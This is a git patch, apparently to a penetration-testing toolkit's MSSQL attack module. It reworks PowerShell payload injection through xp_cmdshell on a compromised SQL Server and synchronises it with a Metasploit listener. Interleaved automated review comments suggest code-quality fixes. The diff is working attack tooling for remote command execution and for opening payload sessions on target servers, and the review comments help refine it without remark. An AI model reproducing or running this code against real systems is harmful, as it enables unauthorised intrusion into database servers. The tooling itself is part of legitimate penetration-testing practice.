From b5766a649cd4a15fac0e8e470fae73d73700b3ac Mon Sep 17 00:00:00 2001
From: TrustedSec
Date: Fri, 30 May 2014 14:05:18 -0400
Subject: [PATCH] Major updates to mssql attack powershell injection

---
 readme/CHANGES         |  5 +++++
 src/fasttrack/mssql.py | 27 ++++++++++++++++-----------
 2 files changed, 21 insertions(+), 11 deletions(-)

diff --git a/readme/CHANGES b/readme/CHANGES
index ca3d88da5..c899b06d0 100644
--- a/readme/CHANGES
+++ b/readme/CHANGES
@@ -3,6 +3,11 @@ version 6.0.1
 ~~~~~~~~~~~~~~~~
 * fixed menu system to remove sms spoofing (no longer supported)
+* redesigned powershell injection to be much more efficient
+* removed time delays in powershell injection, instead use pexpect expect() to wait for listener to start
+* added option to fall back to old method if powershell injection fails (option menu)
+* start msf listener first, wait for msf to launch, then trigger vulnerability
+* threaded the powershell injection command through mssql
 ~~~~~~~~~~~~~~~~
 version 6.0
diff --git a/src/fasttrack/mssql.py b/src/fasttrack/mssql.py
index 98889e295..0f3195657 100644
--- a/src/fasttrack/mssql.py
+++ b/src/fasttrack/mssql.py
@@ -103,8 +103,12 @@ def deploy_hex2binary(ipaddr,port,username,password):
     match = re.search("parameter version", bundle)
     # if we have a match we have powershell installed
     if match:
-        print_status("Powershell was identified, targeting server through powershell injection.")
-        option = "1"
+        print_status("Powershell was detected on the remote system.")
+        option_ps = raw_input("Do you want to use powershell injection? [yes/no]:")
+        if option_ps == "" or option_ps == "y" or option_ps == "yes":
+            option = "1"
+            print_status("Powershell delivery selected. Boom!")
+        else: option = "2"
     # otherwise, fall back to the older version using debug conversion via hex
     else:
         print_status("Powershell not detected, attempting Windows debug method.")
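Review bot: The yes/no check added after the `raw_input` prompt compares the raw string, so answers such as `Yes`, `YES` or `y ` with a trailing space silently fall through to `else: option = "2"` even though the prompt offers `[yes/no]`; normalize first with `if option_ps.strip().lower() in ("", "y", "yes"):`. The prompt text also does not tell the operator that an empty answer selects powershell injection, which is what the `option_ps == ""` branch does, so the `[yes/no]` hint should say which is the default. The single-line `else: option = "2"` is the only compound statement on one line in this hunk; putting the assignment on its own indented line matches the `if` branch above it. deploy_hex2binary's body continues outside the hunk on both sides.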
@@ -199,6 +203,9 @@ def deploy_hex2binary(ipaddr,port,username,password):
         except:
             import pexpect
         print_status("Starting the Metasploit listener...")
         child2 = pexpect.spawn("%s/msfconsole -r %s/reports/powershell/powershell.rc" % (msf_path,setdir))
+        print_status("Waiting for the listener to start first before we continue forward...")
+        print_status("Be patient, Metaploit takes a little bit to start...")
+        child2.expect("Starting the payload handler", timeout=30000)
         # assign random_exe command to the powershell command
         random_exe = powershell_command
@@ -265,25 +272,23 @@ def deploy_hex2binary(ipaddr,port,username,password):
         # thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified
         try: reload(thread)
         except: import thread
+        # execute the payload
         # we append more commands if option 1 is used
-        if option == "1":
-            print_status("Trigger the powershell injection payload.. ")
-            mssql.sql_query("exec master..xp_cmdshell '%s'" % (powershell_command))
+        print_status("Triggering the powershell injection payload... ")
+        sql_command = ("exec master..xp_cmdshell '%s'" % (powershell_command))
+        #mssql.sql_query("exec master..xp_cmdshell '%s'" % (powershell_command))
+        thread.start_new_thread(mssql.sql_query, (sql_command,))
+        # using the old method
         if option == "2":
+            print_status("Triggering payload stager...")
             sql_command = ("xp_cmdshell '%s'" % (random_exe))
             # start thread of SQL command that executes payload
             thread.start_new_thread(mssql.sql_query, (sql_command,))
             time.sleep(1)
-            # pause to let metasploit launch - real slow systems may need to adjust
-            # i need to rewrite this to do a child.expect on msf and wait until that happens
-            print_status("Pausing 15 seconds to let the system catch up...")
-            time.sleep(15)
-            print_status("Triggering payload stager...")
-            # if pexpect doesnt exit right then it freaks out
         if os.path.isfile(setdir + "/set.payload"):
             os.system("python ../../payloads/set_payloads/listener.py")
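Review bot: The added `child2.expect("Starting the payload handler", timeout=30000)` has no handler for the `pexpect.TIMEOUT` and `pexpect.EOF` it raises when msfconsole exits early or never prints that line (for example when `msf_path` or the `.rc` file path is wrong), so the whole deploy dies with a traceback instead of a status message; wrap the call in `try/except (pexpect.TIMEOUT, pexpect.EOF):` and report why the listener did not come up before deciding whether to continue. The `timeout` argument is in seconds, so `30000` waits more than eight hours; if a bound of a few minutes was intended, use that value and say so in a comment next to the call. The second status line also misspells Metasploit as `Metaploit`. deploy_hex2binary begins and ends outside this hunk.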